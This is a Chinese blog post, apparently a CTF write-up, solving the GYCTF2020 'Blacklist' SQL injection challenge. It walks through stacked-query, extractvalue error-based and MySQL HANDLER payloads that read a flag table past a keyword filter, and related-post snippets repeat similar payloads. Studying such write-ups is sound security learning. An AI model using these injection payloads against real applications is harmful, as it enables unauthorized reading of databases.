[GYCTF2020]Blacklist 1

最新推荐文章于 2024-02-05 15:01:15 发布
最新推荐文章于 2024-02-05 15:01:15 发布
阅读量2.4k 收藏 12
点赞数 1
分类专栏: buuctf 文章标签: web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62879498/article/details/124477570
版权

[GYCTF2020]Blacklist 1

在做本题的时候,我们发现过滤掉了很多的关键字
在这里插入图片描述
很多注入方法已经没有办法使用(联合查询 布尔盲注 updataxml的报错注入)
并且发现本关的注入方法为 单引号
只能使用 堆叠注入 来进行查询查寻 库名 表名

1';show databases-- q

在这里插入图片描述
库名:supersqli

在这里 因为没有禁用 extractvalue 所以在这里我们可以构造出 extractvalue 报错注入 来查询库名

1' and (extractvalue(1,concat(0x7e,database(),0x7e)))-- q

在这里插入图片描述

1';show tables-- q

在这里插入图片描述

表名:words 和 FlagHere
分别查看这两个表

 1'; show columns from `words`-- q

在这里插入图片描述

 1'; show columns from `FlagHere`-- q

在这里插入图片描述
words表里有两个属性,即两列:id 和data,而FlagHere表里只有一个属性列,说明输入框可能查询的就是words表
很像我们做过的随便注

但,在这一关过滤掉了flag和rename,并且不区分大小写 换句话说我们没有办法像随便住那样将 flaghere这个表改名为words
所以我们需要尝试别的思路 Handler

MySQL 除了可以使用 select 查询表中的数据,也可使用 handler 语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler 语句并不具备 select 语句的所有功能。它是 MySQL 专用的语句,并没有包含到SQL标准中。

HANDLER … OPEN语句打开一个表
HANDLER … READ语句访问
HANDLER … CLOSE关闭一个表

构造payload:

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#

在这里插入图片描述

hcjtn
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ipset-blacklist:一个bash脚本,禁止在黑名单中发布大量IP地址
02-05
ipset-blacklist:一个bash脚本,禁止在黑名单中发布大量IP地址
blacklist-jee
07-08
blacklist-jee 您将需要 Java8 来编译和运行。 检查您的应用程序是否正在运行在安装了 git、java8、docker 和 maven 的本地 Ubuntu VM 中进行开发先决条件:已安装 VirtualBox 和 Vagrant。 从该项目的根目录初始化...
[GYCTF2020]Blacklist1
whale_waves的博客
11-07 99
其实这一题我看到的第一反应是基于布尔的盲注 原因: 没有禁用ascii substr 之类的, 并且输入1和0时输入1会有回显0不会 这里将预编译注入、联合注入、报错注入、都过滤的干净 通过它给出的黑名单考虑可用的命令 可尝试的 堆叠注入例如show database和show tables handler命令 基于布尔的盲注(通过1^0^1,真假真为假,1^1^1,真真真为真,来做手段) !!这里后面会排除掉,应为后面才想起来select被禁了,但是查询需要用
[GYCTF2020]Blacklist1-BUUCTF-详解
最新发布
chinese_cabbage0的博客
02-05 1743
主要是buuctf的整个题目的解题过程,比较好理解,也比较全面,大家可以参考一下
android_system_blacklist_android_msm8610_
10-03
1. **qcom**:这通常表示这是针对高通(Qualcomm)处理器的优化或配置文件。QCOM是高通公司的代码别名,里面可能包含针对MSM8610的驱动程序、库或者其他专有设置。 2. **netd**:Netd是Android系统的网络守护进程,...
Mikrotik-Blacklist
03-05
/tool fetch address=raw.githubusercontent.com host=raw.githubusercontent.com mode=https src-path=stathis/Mikrotik-Blacklist/master/a_blacklist_file.rsc/import a_blacklist_File.rsc其他资讯此回购应该...
cpf_blacklist
02-08
项目名为"cpf_blacklist-master"暗示这是一个主分支或主要版本,可能包含源代码、测试文件、文档和其他资源。 以下是围绕这个主题可能涉及的一些详细知识点: 1. **字符串操作**:在Python中,CPF号码通常以特定...
[GYCTF2020]Blacklist
weixin_52268949的博客
01-26 2352
[GYCTF2020]Blacklist(堆叠注入) 补充知识点 desc查看表结构的详细信息 desc table_name; PS:此处desc是describe的缩写,用法: desc 表名/查询语句 desc降序排列数据 select ename,sal from emp order by sal desc; 手动指定按照薪水由大到小排序(降序关键字desc) select ename,sal from emp order by sal asc; 手动指定按照薪水由小到大排序(升序关键字asc) P
buuctf-web-[GYCTF2020]Blacklist1
mlws1900的博客
08-11 360
MySQL 除了可以使用 select 查询表中的数据,也可使用 handler 语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler 语句并不具备 select 语句的所有功能。它是 MySQL 专用的语句,并没有包含到SQL标准中。words表里有两个属性,即两列:id 和data,而FlagHere表里只有一个属性列,说明输入框可能查询的就是words表。换句话说我们没有办法像之前那样将 flaghere这个表改名为words(之前做过一题类似的)OPEN语句打开一个表。...
[GYCTF2020]Blacklist堆叠注入
qq_43801002的博客
04-27 3324
[GYCTF2020]Blacklist 1';show columns from `FlagHere`; %23 查看列 过滤了这么多,比强网杯过滤更加严格了 这里我们用到handler这个东西 HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭...
ROSE笔记-[GYCTF2020]Blacklist 1-WP
居上
11-13 339
[GYCTF2020]Blacklist 1 输入单引号,报错,sql注入. 1' or 1=1 order by 2#没有报错 1' or 1=1 order by 3#报错 先尝试联合查询 1' or 1=1 union select 1,2 发现过滤了大部分关键字 1' or 1=1;show databases;#查库 1' or 1=1;show tables;#查表 1' or 1=1;desc FlagHere;#查字段 HANDLER … OPEN语句打开一个表,使其可以使用后
BUUCTF:[GYCTF2020]Blacklist
末初的CSDN博客
11-09 442
https://buuoj.cn/challenges#[GYCTF2020]Blacklist 和强网杯那道随便注一样,只不过过滤更多了 return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); ?inject=1';show databases--+ ?inject=-1';show tables;--+ ?inject=-1';show colu
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询
weixin_44632787的博客
06-19 652
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询 启动挑战项目,发现前端界面显示Black list is so weak for you,isn’t it 又是一道用堆叠查询的题目,看来CTF也很喜欢考这类型的题目呀! 首先爆出数据库:1’;show databases; 然后爆出表名:1’; show tables; 然后显示某个表里面列的信息:1’;show columns from FlagHere; 接下来的才是重点,在MYSQL数据库中: 可以用handl
blacklist.conf
09-06
blacklist.conf是一个配置文件,用于在Nginx服务器中设置黑名单。可以通过在nginx.conf文件中添加`include /usr/local/nginx/conf/blacklist.conf;`来引入blacklist.conf文件。 在blacklist.conf文件的最后部分,可以插入以下两行内容来禁用nouveau驱动的选项:`blacklist nouveau options nouveau modeset=0`。 另外,如果想要禁用树莓派上的Pi插Kong输入,可以编辑`/etc/modprobe.d/alsa-blacklist.conf`文件,并添加`blacklist snd_bcm2835`一行。然后,需要重新配置音频设备的索引,可以编辑`/lib/modprobe.d/aliases.conf`文件,并更改`options snd-usb-audio index...`所在行的配置。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [nginx 加ip黑名单](https://blog.csdn.net/weixin_43275578/article/details/128966558)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [ubuntu16.04Nvidia驱动、CUDA、cuDNN安装与卸载](https://blog.csdn.net/u013898698/article/details/119000021)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [piloopdrumbox:Raspberry pi +鼓垫+循环站](https://download.csdn.net/download/weixin_42115513/15186998)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值